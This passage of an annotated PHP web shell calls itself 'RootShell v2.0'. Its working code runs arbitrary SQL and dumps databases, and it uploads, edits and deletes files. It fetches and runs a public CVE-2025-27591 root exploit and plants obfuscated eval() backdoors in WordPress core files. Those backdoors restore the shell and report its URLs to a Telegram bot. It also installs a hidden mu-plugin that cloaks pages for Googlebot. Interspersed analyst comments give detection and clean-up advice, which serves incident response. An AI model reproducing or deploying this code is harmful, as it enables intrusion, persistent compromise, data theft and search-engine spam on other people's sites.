$ajax_response = array('status' => 'error', 'message' => "WP Lockdown is not supported on Windows servers.");
} else {
$lock = ($_POST['lock_val'] == '1');
if (wp_toggle_lockdown($wp_dir, $lock)) {
$ajax_response = array('status' => 'success', 'message' => "WP Security " . ($lock ? "LOCKED" : "UNLOCKED"));
} else {
$ajax_response = array('status' => 'error', 'message' => "Failed to update wp-config.php");
}
}
} elseif ($_POST['wp_action'] == 'auto_login') {
$uid = intval($_POST['uid']);
$login_url = wp_auto_login($wp_dir, $uid);
$ajax_response = ['status' => 'success', 'url' => $login_url];
}
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
if (isset($_POST['fm_action'])) {
$action = $_POST['fm_action'];
if ($action == 'get_wp_lock_list') {
$wp_list = wp_find_paths(40);
if (empty($wp_list)) {
echo "<p style='font-size: 12px; color: var(--text-dim); text-align: center; padding: 20px;'>No WordPress sites detected auto-scan.</p>";
} else {
foreach ($wp_list as $w_dir) {
$is_l = wp_get_lock_status($w_dir);
$dir_nm = basename($w_dir);
if ($dir_nm == '.' || $dir_nm == '') $dir_nm = "ROOT";
echo "<div style='display: flex; align-items: center; justify-content: space-between; background: rgba(255,255,255,0.03); padding: 12px; border-radius: 8px; margin-bottom: 10px; border: 1px solid rgba(255,255,255,0.05);'>";
echo " <div style='max-width: 200px;'>";
echo " <div style='font-size: 11px; font-weight: bold; color: #fff;'>" . htmlspecialchars($dir_nm) . "</div>";
echo " <div style='font-size: 9px; color: var(--text-dim); overflow: hidden; text-overflow: ellipsis; white-space: nowrap;'>" . htmlspecialchars($w_dir) . "</div>";
echo " </div>";
echo " <button class='btn btn-sm " . ($is_l ? 'btn-primary' : '') . "' style='font-size: 10px; min-width: 110px; " . ($is_l ? 'background:#f44; border-color:#f44;' : 'background:#222;') . "' onclick=\"toggleCentralWPLock('" . addslashes($w_dir) . "', " . ($is_l ? 0 : 1) . ", this)\">";
echo " <i class='fas " . ($is_l ? 'fa-lock' : 'fa-lock-open') . "'></i> " . ($is_l ? 'LOCKED' : 'UNLOCKED');
echo " </button>";
echo "</div>";
}
}
exit;
}
if ($action == 'create_file') {
$name = trim($_POST['name']);
$content = $_POST['content'];
if (!empty($name)) {
if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $name, $content) !== false) {
$ajax_response = ['status' => 'success', 'message' => "File '$name' created."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to create file."];
}
}
} elseif ($action == 'create_folder') {
$name = trim($_POST['name']);
if (!empty($name)) {
if (mkdir(PATH . DIRECTORY_SEPARATOR . $name)) {
$ajax_response = ['status' => 'success', 'message' => "Folder '$name' created."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to create folder."];
}
}
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
// NOTE(analysis): database console. Connection parameters come from the
// request, and the `query` and `delete_row` actions pass request text to
// MySQL as-is, so anything the supplied database account may do is within
// reach. The `export_sql` action writes a full dump into the current PATH
// directory as `dump_<db>_<YmdHis>.sql`, beginning with the comment
// "-- Generated by Antigravity DB Manager"; search the web root for files
// of that name and header, since a dump left there may also be
// downloadable. Least-privilege database accounts limit the blast radius.
if (isset($_POST['db_action'])) {
$host = $_POST['db_host'] ?: 'localhost';
$user = $_POST['db_user'];
$pass = $_POST['db_pass'];
$db = $_POST['db_name'];
$mysqli = @new mysqli($host, $user, $pass, $db);
if ($mysqli->connect_errno) {
$ajax_response = ['status' => 'error', 'message' => "DB Connection error: " . $mysqli->connect_error];
} else {
$action = $_POST['db_action'];
if ($action == 'query') {
// Arbitrary statement; result rows or affected-row count are returned.
$sql = $_POST['sql'];
$res = $mysqli->query($sql);
if ($res === true) {
$ajax_response = ['status' => 'success', 'message' => "Query executed: " . $mysqli->affected_rows . " rows affected."];
} elseif ($res instanceof mysqli_result) {
$data = [];
while ($row = $res->fetch_assoc()) $data[] = $row;
$ajax_response = ['status' => 'success', 'data' => $data, 'count' => count($data)];
} else {
$ajax_response = ['status' => 'error', 'message' => "SQL Error: " . $mysqli->error];
}
} elseif ($action == 'list_tables') {
$res = $mysqli->query("SHOW TABLES");
$tables = [];
$wp_info = null;
if ($res) {
while ($row = $res->fetch_array()) {
$tables[] = $row[0];
}
// The first table ending in "_options" is taken as a WordPress options
// table and queried for the `whl_page` option.
foreach ($tables as $t) {
if (preg_match('/_options$/', $t)) {
$prefix = str_replace('options', '', $t);
$whl_res = $mysqli->query("SELECT option_value FROM $t WHERE option_name='whl_page' LIMIT 1");
if ($whl_res && $whl_row = $whl_res->fetch_assoc()) {
$wp_info = ['prefix' => $prefix, 'whl' => $whl_row['option_value']];
}
break;
}
}
$ajax_response = ['status' => 'success', 'tables' => $tables, 'wp_info' => $wp_info];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to fetch tables: " . $mysqli->error];
}
} elseif ($action == 'export_sql') {
// Builds CREATE TABLE plus one INSERT per row for every table, in memory.
$res = $mysqli->query("SHOW TABLES");
$dump = "-- Database Export: " . $db . "\n-- Generated by Antigravity DB Manager\n\n";
while($row = $res->fetch_array()) {
$table = $row[0];
$res2 = $mysqli->query("SHOW CREATE TABLE `$table` ");
$row2 = $res2->fetch_array();
$dump .= "\n\n" . $row2[1] . ";\n\n";
$res3 = $mysqli->query("SELECT * FROM `$table` ");
while($row3 = $res3->fetch_assoc()) {
$keys = array_keys($row3);
$vals = array_map([$mysqli, 'real_escape_string'], array_values($row3));
$dump .= "INSERT INTO `$table` (`" . implode("`,`", $keys) . "`) VALUES ('" . implode("','", $vals) . "');\n";
}
}
$filename = "dump_{$db}_" . date("Ymd_His") . ".sql";
if (root_write_file(PATH . DIRECTORY_SEPARATOR . $filename, $dump)) {
$ajax_response = ['status' => 'success', 'message' => "Database exported to $filename"];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to write dump file."];
}
} elseif ($action == 'delete_row') {
$table = $_POST['table'];
$where = $_POST['where'];
if ($mysqli->query("DELETE FROM `$table` WHERE $where LIMIT 1")) {
$ajax_response = ['status' => 'success', 'message' => "Row deleted."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to delete: " . $mysqli->error];
}
}
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
// NOTE(analysis): file-manager write paths - upload into PATH, rename
// within PATH, and overwrite a file's contents. All three redirect back to
// `?p=<encoded PATH>` on success. File-integrity monitoring on the web root
// and a read-only code tree for the PHP user are the controls that catch or
// prevent these writes; during response, review files under the web root
// whose modification times fall inside the access-log window for this file.
if (isset($_POST['upload'])) {
$target = PATH . DIRECTORY_SEPARATOR . basename($_FILES["fileToUpload"]["name"]);
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target)) {
header("Location: ?p=" . encodePath(PATH)); exit;
}
}
// Rename: old name from query parameter `r`, new name from the POST body.
if (isset($_POST['rename'])) {
$old = PATH . DIRECTORY_SEPARATOR . $_GET['r'];
$new = PATH . DIRECTORY_SEPARATOR . $_POST['new_name'];
if (rename($old, $new)) { header("Location: ?p=" . encodePath(PATH)); exit; }
}
// Edit: file name from query parameter `e`, new contents from the POST body.
if (isset($_POST['edit'])) {
$file = PATH . DIRECTORY_SEPARATOR . $_GET['e'];
if (file_put_contents($file, $_POST['content']) !== false) { header("Location: ?p=" . encodePath(PATH)); exit; }
}
// NOTE(analysis): self-modification. The script reads its own source,
// regex-replaces the five setting assignments ($pagePasswordEnable,
// $username, $password, $telegram_token, $telegram_chatid) with posted
// values and writes the file back. Copies of this file therefore differ in
// content and hash from one host to another, so detection should match on
// stable content (function names, the login page title, parameter names)
// rather than on a file hash.
if (isset($_POST['save_settings'])) {
$c = file_get_contents(__FILE__);
$new_enable = $_POST['login_enable'] === '1' ? '1' : '0';
$new_user = $_POST['login_user'];
$new_pass = $_POST['login_pass'];
$c = preg_replace('/\$pagePasswordEnable\s*=\s*\'[01]\';/', "\$pagePasswordEnable = '$new_enable';", $c);
$c = preg_replace('/\$username\s*=\s*\'[^\']*\';/', "\$username = '$new_user';", $c);
$c = preg_replace('/\$password\s*=\s*\'[^\']*\';/', "\$password = '$new_pass';", $c);
$c = preg_replace('/\$telegram_token\s*=\s*\'[^\']*\';/', "\$telegram_token = '" . $_POST['tg_token'] . "';", $c);
$c = preg_replace('/\$telegram_chatid\s*=\s*\'[^\']*\';/', "\$telegram_chatid = '" . $_POST['tg_chatid'] . "';", $c);
if (file_put_contents(__FILE__, $c)) {
$ajax_response = ['status' => 'success', 'message' => "Settings saved. Please refresh."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to write to file."];
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
// NOTE(analysis): local privilege-escalation attempt; the log strings (in
// Turkish) label it CVE-2025-27591. Observable steps, in order:
//   1. probes for a `below` binary and for the /var/log/below directory;
//   2. downloads a Python script from raw.githubusercontent.com into the
//      working directory as `.dbs_exploit.py`;
//   3. runs it with python3, falling back to python;
//   4. deletes the script and greps /etc/passwd for the account name
//      `dollarboysushil` to judge the outcome.
// Host-side checks for responders: an /etc/passwd entry with that name,
// python/which/grep processes parented by the PHP worker, and outbound
// requests to the URL below. Whether the host was exposed depends on `below`
// being installed and unpatched; confirm package state and update it.
if (isset($_POST['action']) && $_POST['action'] == 'auto_root') {
root_log("[*] [CVE-2025-27591] Privilege Escalation motoru başlatıldı...");
$has_below = trim(root_exec("which below 2>/dev/null"));
$log_dir_exists = trim(root_exec("[ -d /var/log/below ] && echo '1' || echo '0'"));
if (!$has_below) {
root_log("[!] TEŞHİS: 'below' binary'si bulunamadı. Exploit muhtemelen başarısız olacak.");
}
if ($log_dir_exists === '0') {
root_log("[!] TEŞHİS: /var/log/below dizini mevcut değil.");
}
$exploit_url = "https://raw.githubusercontent.com/dollarboysushil/Linux-Privilege-Escalation-CVE-2025-27591/refs/heads/main/dbs_exploit.py";
$tmp_py = './.dbs_exploit.py';
root_log("[*] Exploit indiriliyor: $exploit_url");
if (root_smart_download($exploit_url, $tmp_py)) {
root_log("[+] Exploit indirildi. Çalıştırılıyor...");
$output = root_exec("python3 $tmp_py 2>&1 || python $tmp_py 2>&1");
// Script output is copied line by line into the session log.
foreach(explode("\n", $output) as $line) {
if(trim($line)) {
$l = trim($line);
root_log("[PY] " . $l);
}
}
@unlink($tmp_py);
$check = root_exec("grep 'dollarboysushil' /etc/passwd");
if (strpos($check, 'dollarboysushil') !== false) {
root_log("[SUCCESS] Exploit BAŞARILI! Kullanıcı: dollarboysushil");
} else {
root_log("[!] Exploit tamamlandı. Sistem bu açığa karşı yamalı veya 'below' konfigürasyonu uyumsuz.");
if (!$has_below) root_log("[?] İpucu: Sistemde 'below' yüklü değil, başka bir exploit deneyin.");
}
} else {
root_log("[!!] Hata: Exploit dosyası indirilemedi.");
}
header("Location: ?linr00t"); exit;
}
// NOTE(analysis): persistence by WordPress core-file modification. A
// compressed copy of this script and a small "guard" routine are packed into
// one eval() line that is placed at the start of five core files in every
// WordPress install found under the scan base. Consequences for clean-up:
//   - deleting this file alone does not remove the infection: on a later
//     page load the guard rewrites the script into up to three of the WP
//     root, wp-includes, wp-content, plugins, themes and uploads
//     directories, and reports the resulting URLs to the Telegram bot;
//   - every infected file carries the marker comment
//     `/* WP-Core-Optimization */` followed by
//     `eval(gzuncompress(base64_decode(` on its first line;
//   - the five targets are stock core files, so comparing core against
//     official checksums (for example WP-CLI `wp core verify-checksums`) and
//     reinstalling core from a clean source both detects and removes it.
if (isset($_POST['wp_deep_persistence'])) {
$shell_name = basename(__FILE__);
$shell_content = @file_get_contents(__FILE__);
$compressed = base64_encode(gzcompress($shell_content, 9));
$tg_t = $telegram_token;
$tg_c = $telegram_chatid;
// $guard_raw is PHP source held as a string. It acts only when the script is
// missing from the directory two levels above the infected file.
$guard_raw = '
$f = "' . $shell_name . '";
$p = "' . $compressed . '";
$t = "' . $tg_t . '";
$c = "' . $tg_c . '";
$root = dirname(__FILE__, 2);
if(!file_exists($root."/$f") && !isset($GLOBALS["guard_run"])){
$GLOBALS["guard_run"] = 1;
$targets = array($root);
$choices = array("wp-includes", "wp-content", "wp-content/plugins", "wp-content/themes", "wp-content/uploads");
foreach($choices as $dir) if(@is_dir($root."/".$dir)) $targets[] = $root."/".$dir;
shuffle($targets);
$chosen = array_slice($targets, 0, 3);
$found_urls = array();
foreach($chosen as $t_dir){
$dest = $t_dir . DIRECTORY_SEPARATOR . $f;
if(@file_put_contents($dest, gzuncompress(base64_decode($p)))){
$u = (empty($_SERVER["HTTPS"]) ? "http" : "https") . "://" . $_SERVER["HTTP_HOST"] . str_replace(array($root, "\\"), array("", "/"), $dest);
$found_urls[] = $u;
}
}
if(!empty($found_urls)){
$m = "<b>[DEEP-GUARD] Multi-Restore Success!</b>\nHost: " . $_SERVER["HTTP_HOST"] . "\nURLs:\n" . implode("\n", $found_urls);
@file_get_contents("https://api.telegram.org/bot$t/sendMessage?chat_id=$c&parse_mode=HTML&text=".urlencode($m));
}
}';
// The guard is compressed and base64-encoded again, then wrapped in the
// marker comment plus eval() so the injected line is a single opaque blob.
$obfuscated_guard = '<?php /* WP-Core-Optimization */ eval(gzuncompress(base64_decode("' . base64_encode(gzcompress($guard_raw, 9)) . '"))); ';
$scan_root = root_find_scan_base();
$wp_dirs = [];
// Every directory under the scan base holding a wp-config.php counts as an install.
try {
if (class_exists("RecursiveDirectoryIterator")) {
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan_root, RecursiveDirectoryIterator::SKIP_DOTS));
foreach($it as $f) {
if($f->getFilename() == "wp-config.php") $wp_dirs[] = $f->getPath();
}
}
} catch(Exception $e) {}
$injected_files = [];
$deep_targets = ["wp-includes/capabilities.php", "wp-includes/plugin.php", "wp-includes/post.php", "wp-includes/formatting.php", "wp-includes/class-wp-hook.php"];
foreach($wp_dirs as $wd) {
foreach($deep_targets as $dt) {
$target_path = $wd . DIRECTORY_SEPARATOR . str_replace("/", DIRECTORY_SEPARATOR, $dt);
if(file_exists($target_path)) {
$content = file_get_contents($target_path);
// Files already carrying the marker are left alone.
if(strpos($content, "WP-Core-Optimization") === false) {
// The guard replaces the opening "<?php" tag, or is prepended when the
// file does not start with one.
$new_content = preg_replace("/^<\?php/", $obfuscated_guard, $content);
if($new_content === $content) $new_content = $obfuscated_guard . $content;
if(@file_put_contents($target_path, $new_content)) $injected_files[] = $target_path;
}
}
}
}
root_log("[+] Deep Persistence deployed to " . count($injected_files) . " core files.");
header("Location: ?b4ckd00rcr3at3"); exit;
}
if (isset($_POST['wp_stealth_cloak'])) {
$cloak_code = '<?php
add_filter(\'show_advanced_plugins\', function($show, $type) {
return false;
}, 9999, 2);
add_filter(\'plugins_list\', function($plugins) {
if (isset($plugins[\'mustuse\'])) {
unset($plugins[\'mustuse\']);
}
return $plugins;
}, 9999);
define(\'BOZCLOAK_SECRET_KEY\', \'bozallah\');
define(\'BOZCLOAK_PARAM\', \'boz\');
define(\'BOZCLOAK_FILE_DIR\', WP_CONTENT_DIR . \'/uploads/bozcloak/\');
class BozCloakStealth {
private $google_user_agents = [
\'googlebot\', \'AdsBot-Google\', \'Mediapartners-Google\', \'Google-Read-Aloud\',
\'DuplexWeb-Google\', \'googleweblight\', \'Storebot-Google\', \'Google-Site-Verification\',
\'Google-InspectionTool\', \'google\'
];
private $google_ip_ranges = [
\'64.233.160.0/19\', \'66.102.0.0/20\', \'66.249.64.0/19\', \'72.14.192.0/18\',
\'74.125.0.0/16\', \'108.177.8.0/21\', \'173.194.0.0/16\', \'207.126.144.0/20\',
\'209.85.128.0/17\', \'216.58.192.0/19\', \'216.239.32.0/19\'
];
public function __construct() {
if (!file_exists(BOZCLOAK_FILE_DIR)) {
wp_mkdir_p(BOZCLOAK_FILE_DIR);
@file_put_contents(BOZCLOAK_FILE_DIR . \'.htaccess\', "Order Deny,Allow\nDeny from all\n<FilesMatch \'\\.php$\'>\n Order Deny,Allow\n Deny from all\n</FilesMatch>");
}
add_action(\'init\', [$this, \'check\'], 5);
}
public function check() {
if (is_admin() || wp_doing_ajax() || wp_doing_cron()) return;
$ua = $_SERVER[\'HTTP_USER_AGENT\'] ?? \'\';
$ip = $this->get_ip();
$ref = $_SERVER[\'HTTP_REFERER\'] ?? \'\';
$bot = $this->is_google($ua, $ip);
$google_referer = stripos($ref, \'google.\') !== false;
$refresh = $this->is_refresh();
if ($bot) {
$this->serve_cloak();
exit;
}
if ($google_referer && !$refresh) {
$expire = time() + 86400 * 3;
setcookie(\'google_visit\', \'2\', $expire, \'/\', parse_url(home_url(), PHP_URL_HOST), is_ssl(), true);
return;
}
if (isset($_GET[BOZCLOAK_PARAM]) && isset($_GET[\'key\']) && $_GET[\'key\'] === BOZCLOAK_SECRET_KEY) {
$this->hidden_editor();
exit;
}
}
private function is_google($ua, $ip) {
$ua = strtolower($ua);
foreach ($this->google_user_agents as $b) {
if (stripos($ua, $b) !== false) return true;
}
return $this->ip_check($ip);
}
private function ip_check($ip) {
$long = ip2long($ip);
if ($long === false) return false;
foreach ($this->google_ip_ranges as $range) {
[$net, $mask] = explode(\'/\', $range);
$subnet = ip2long($net);
$bitmask = -1 << (32 - $mask);
if (($long & $bitmask) === ($subnet & $bitmask)) return true;
}
return false;
}
private function get_ip() {
foreach ([\'HTTP_X_FORWARDED_FOR\', \'HTTP_CLIENT_IP\', \'REMOTE_ADDR\'] as $k) {
if (!empty($_SERVER[$k])) {
$ips = explode(\',\', trim($_SERVER[$k]));
$ip = trim($ips[0]);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
return $ip;
}
}
}
return \'0.0.0.0\';
}
private function is_refresh() {
$url = (isset($_SERVER[\'HTTPS\']) && $_SERVER[\'HTTPS\'] === \'on\' ? \'https\' : \'http\') . \'.://\' . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\'];
$last = $_SESSION[\'boz_last_url\'] ?? \'\';
$_SESSION[\'boz_last_url\'] = $url;
return $last === $url;
}
private function serve_cloak() {
$file = get_option(\'bozcloak_active\', \'\');
$path = $file ? BOZCLOAK_FILE_DIR . $file : \'\';
header(\'Content-Type: text/html; charset=UTF-8\');
if ($file && file_exists($path)) {
include $path;
} else {
echo \'<!DOCTYPE html><html><head><meta charset="utf-8"><title>...</title></head><body><h1>Google Özel İçerik</h1></body></html>\';
}
exit;
}
private function hidden_editor() {
if (!current_user_can(\'manage_options\')) {
wp_die(\'403 Yasak\', \'Erişim Yok\', [\'response\' => 403]);
}
$msg = \'\';
$content = \'\';
$active = get_option(\'bozcloak_active\', \'\');
$path = $active ? BOZCLOAK_FILE_DIR . $active : \'\';
if ($active && file_exists($path)) {
$content = file_get_contents($path);
}
if (isset($_POST[\'save\']) && check_admin_referer(\'bozcloak\')) {
$new_content = wp_kses_post($_POST[\'content\'] ?? \'\');
$new_name = \'c_\' . wp_generate_password(10, false) . \'.php\';
$new_path = BOZCLOAK_FILE_DIR . $new_name;
if (file_put_contents($new_path, $new_content) !== false) {
update_option(\'bozcloak_active\', $new_name);
if ($active && $active !== $new_name) @unlink($path);
$msg = \'<div style="background:#d4edda;padding:15px;border:1px solid #c3e6cb;">Kaydedildi → \' . esc_html($new_name) . \'</div>\';
$content = $new_content;
$active = $new_name;
} else {
$msg = \'<div style="background:#f8d7da;padding:15px;border:1px solid #f5c6cb;">Dosya yazılamadı! İzinleri kontrol et.</div>\';
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="utf-8">
<title>Stealth Editor</title>
<?php wp_head(); ?>
<style>
body {font-family: system-ui, sans-serif; background:#f6f7f8; margin:0; padding:30px;}
.container {max-width:1100px; margin:auto; background:white; padding:30px; border-radius:10px; box-shadow:0 5px 25px rgba(0,0,0,0.1);}
textarea {width:100%; height:65vh; font-family: \\\'Courier New\\\', monospace; font-size:14px; padding:15px; border:1px solid
.button {background:#0066cc; color:white; border:none; padding:12px 24px; border-radius:6px; cursor:pointer; font-size:16px;}
</style>
</head>
<body>
<div class="container">
<h1>Gizli Tema Editörü</h1>
<?php echo $msg; ?>
<p>Aktif dosya: <strong><?php echo $active ?: \\\'Yok\\\'; ?></strong></p>
<form method="post">
<?php wp_nonce_field(\\\'bozcloak\\\'); ?>
<textarea name="content"><?php echo esc_textarea($content); ?></textarea>
<p><button type="submit" name="save" class="button">Kaydet & Yeni Dosya Oluştur</button></p>
</form>
</div>
<?php wp_footer(); ?>
</body>
</html>
<?php
exit;
}
}
new BozCloakStealth(); ?>';
$scan_root = root_find_scan_base();
$wp_dirs = [];
try {
if (class_exists("RecursiveDirectoryIterator")) {
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan_root, RecursiveDirectoryIterator::SKIP_DOTS));
foreach ($it as $f) {
if ($f->getFilename() == 'wp-config.php') $wp_dirs[] = $f->getPath();
}
}
} catch (Exception $e) {}
$injected_count = 0;
foreach ($wp_dirs as $wd) {
$mu_dir = $wd . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'mu-plugins';
if (!file_exists($mu_dir)) @mkdir($mu_dir, 0755, true);
$target = $mu_dir . DIRECTORY_SEPARATOR . 'bozcloak.php';
if (@file_put_contents($target, $cloak_code)) {
$injected_count++;
}
}
root_log("[+] Stealth BozCloak injected into $injected_count WordPress mu-plugins.");
header("Location: ?b4ckd00rcr3at3"); exit;
}
}
// Analyst note: file/directory delete handler of this web shell. It runs when both
// GET parameters `d` and `q` are present; the value of `q` is never read here.
// `d` is appended to PATH (a constant defined outside this excerpt) with no validation
// in this block, and no authentication or CSRF check is visible here.
// NOTE(review): an access gate may exist earlier in the file; confirm before triage.
if (isset($_GET['d']) && isset($_GET['q'])) {
$target = PATH . DIRECTORY_SEPARATOR . $_GET['d'];
// unlink() handles files; rmdir() (errors suppressed) only removes empty directories.
if (is_file($target)) unlink($target); elseif (is_dir($target)) @rmdir($target);
// Detection: the response is a redirect to `?p=<encodePath(PATH)>`. encodePath() swaps
// "/", "\", "." and ":" for Bengali letters, so access logs show a GET carrying `d=` and
// `q=` followed by a GET whose `p=` value contains percent-encoded non-ASCII characters.
header("Location: ?p=" . encodePath(PATH)); exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>RootShell v2.0 | Advanced Backend Administration</title>
<!-- Fonts & Icons -->
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400;600&family=Outfit:wght@300;400;700;900&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css">
<script>
function toggle(id) {
const el = document.getElementById(id);
if (el) el.classList.toggle('hidden');
}
function resetPassword(wpDir, uid, inputId, btn) {
const newpw = document.getElementById(inputId).value;
btn.disabled = true;
const originalText = btn.innerText;
btn.innerText = 'WAIT';
const formData = new FormData();
formData.append('wp_action', 'reset_pw');
formData.append('wp_dir', wpDir);
formData.append('reset_uid', uid);
formData.append('newpw', newpw);
fetch('?ajax', { method: 'POST', body: formData })
.then(r => r.json())
.then(data => {
alert(data.message);
if(data.status === 'success') { btn.innerText = 'OK'; } else { btn.innerText = originalText; btn.disabled = false; }
});
}
function deleteUser(wpDir, uid) {
if(!confirm('Delete user ' + uid + '?')) return;
const formData = new FormData();
formData.append('wp_action', 'delete_user');
formData.append('wp_dir', wpDir);
formData.append('uid', uid);
fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
function addAdmin(wpDir, dirId, btn) {
const user = document.getElementById('add_user_' + dirId).value;
const pass = document.getElementById('add_pass_' + dirId).value;
const email = document.getElementById('add_email_' + dirId).value;
if(!user || !pass || !email) return alert('Fill all');
btn.disabled = true;
btn.innerText = 'CREATING...';
const formData = new FormData();
formData.append('wp_action', 'add_admin');
formData.append('wp_dir', wpDir);
formData.append('new_user', user);
formData.append('new_pass', pass);
formData.append('new_email', email);
fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload(); else btn.disabled = false;
});
}
function createItem(type) {
const name = prompt(type === 'file' ? 'File Name:' : 'Folder Name:');
if (!name) return;
let content = '';
if (type === 'file') content = prompt('Initial Content (Optional):', '');
const formData = new FormData();
formData.append('fm_action', type === 'file' ? 'create_file' : 'create_folder');
formData.append('name', name);
if (type === 'file') formData.append('content', content);
fetch('?ajax&p=<?= encodePath(PATH) ?>', { method: 'POST', body: formData }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
</script>
<style>
@import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;600&display=swap');
:root {
--bg: #0b0b0b;
--surface: #161616;
--surface-hover: #1c1c1c;
--border: #222;
--primary: #0070f3;
--accent: #00dfd8;
--text: #eaeaea;
--text-muted: #888;
--danger: #ff4d4d;
--success: #00ff7f;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
background-color: var(--bg);
color: var(--text);
font-family: 'Inter', -apple-system, sans-serif;
font-size: 13px;
-webkit-font-smoothing: antialiased;
overflow-x: hidden;
}
.info-bar {
background: var(--bg);
border-bottom: 1px solid var(--border);
padding: 0 24px;
height: 48px;
display: flex;
justify-content: space-between;
align-items: center;
position: sticky;
top: 0;
z-index: 1000;
}
.info-left, .info-right { display: flex; gap: 24px; align-items: center; }
.info-item { display: flex; align-items: center; gap: 6px; font-family: 'JetBrains Mono', monospace; font-size: 11px; }
.info-label { color: var(--text-muted); font-weight: 500; }
.info-value { color: var(--text); }
.info-value.text-accent { color: var(--accent); font-weight: 600; }
.badge-system {
border: 1px solid var(--border);
padding: 2px 6px;
border-radius: 4px;
font-size: 10px;
color: var(--text-muted);
font-family: 'JetBrains Mono', monospace;
white-space: nowrap;
}
.status-badges { display: flex; gap: 6px; align-items: center; }
.container { display: flex; min-height: calc(100vh - 48px); }
aside {
width: 220px;
background: var(--bg);
border-right: 1px solid var(--border);
padding: 24px 12px;
display: flex;
flex-direction: column;
gap: 2px;
}
.nav-link {
text-decoration: none;
color: var(--text-muted);
padding: 8px 12px;
border-radius: 6px;
transition: 0.1s;
display: flex;
align-items: center;
gap: 10px;
font-weight: 500;
}
.nav-link i { width: 16px; font-size: 14px; text-align: center; }
.nav-link:hover { background: var(--surface-hover); color: var(--text); }
.nav-link.active { background: var(--surface-hover); color: var(--accent); }
main { flex: 1; padding: 40px; }
.title-section { margin-bottom: 32px; }
.title-section h1 {
font-size: 24px;
font-weight: 700;
letter-spacing: -0.5px;
color: var(--primary);
}
.title-section p { color: var(--text-muted); font-size: 13px; margin-top: 4px; }
.card {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 8px;
padding: 24px;
margin-bottom: 24px;
}
.data-table { width: 100%; border-collapse: collapse; }
.data-table th {
text-align: left;
padding: 12px;
color: var(--text-muted);
font-size: 11px;
font-weight: 600;
text-transform: uppercase;
border-bottom: 1px solid var(--border);
}
.data-table td {
padding: 12px;
border-bottom: 1px solid var(--border);
vertical-align: middle;
color: var(--text);
}
.data-table tr:hover td { background: var(--surface-hover); }
.btn {
background: var(--surface);
color: var(--text);
border: 1px solid var(--border);
padding: 6px 14px;
border-radius: 6px;
cursor: pointer;
font-weight: 500;
display: inline-flex;
align-items: center;
gap: 8px;
transition: all 0.2s cubic-bezier(0.4, 0, 0.2, 1);
text-decoration: none;
font-size: 12px;
}
.btn:hover {
background: var(--surface-hover);
border-color: var(--text-muted);
transform: translateY(-1px);
box-shadow: 0 4px 12px rgba(0,0,0,0.5);
}
.btn:active { transform: translateY(0); }
.btn-primary {
background: var(--accent);
border-color: var(--accent);
color: #000;
}
.btn-primary:hover { opacity: 0.9; box-shadow: 0 0 15px rgba(0, 112, 243, 0.3); }
.btn-danger {
background: rgba(255, 77, 77, 0.03);
border: 1px solid rgba(255, 77, 77, 0.1);
color: var(--danger);
}
.btn-danger:hover { background: var(--danger); color: #fff; }
.btn-accent {
background: var(--surface-hover);
border: 1px solid var(--border);
color: var(--text);
}
input, textarea, select {
background: var(--bg);
border: 1px solid var(--border);
color: var(--text);
padding: 10px 14px;
border-radius: 6px;
outline: none;
width: 100%;
font-size: 13px;
transition: border-color 0.2s;
}
input:focus, textarea:focus, select:focus { border-color: var(--accent); }
select option { background: var(--surface); color: var(--text); }
.breadcrumb {
margin-bottom: 24px;
font-size: 13px;
color: var(--text-muted);
display: flex;
align-items: center;
gap: 8px;
}
.breadcrumb a {
color: var(--text);
text-decoration: none;
font-weight: 500;
}
.breadcrumb a:hover { color: var(--accent); }
.breadcrumb i { color: var(--accent); font-size: 16px; }
pre {
background: #000;
border: 1px solid var(--border);
border-radius: 6px;
padding: 16px;
font-family: 'JetBrains Mono', monospace;
font-size: 12px;
line-height: 1.5;
color: var(--text);
overflow: auto;
}
.status-off { color: var(--danger); font-weight: 600; }
.status-on { color: var(--success); font-weight: 600; }
.hidden { display: none; }
::-webkit-scrollbar { width: 4px; height: 4px; }
::-webkit-scrollbar-track { background: var(--bg); }
::-webkit-scrollbar-thumb { background: var(--border); border-radius: 10px; }
::-webkit-scrollbar-thumb:hover { background: var(--text-muted); }
@media (max-width: 1000px) {
.info-bar { height: auto; padding: 12px; flex-direction: column; gap: 12px; }
.container { flex-direction: column; }
aside { width: 100%; height: auto; position: static; border-right: none; border-bottom: 1px solid var(--border); }
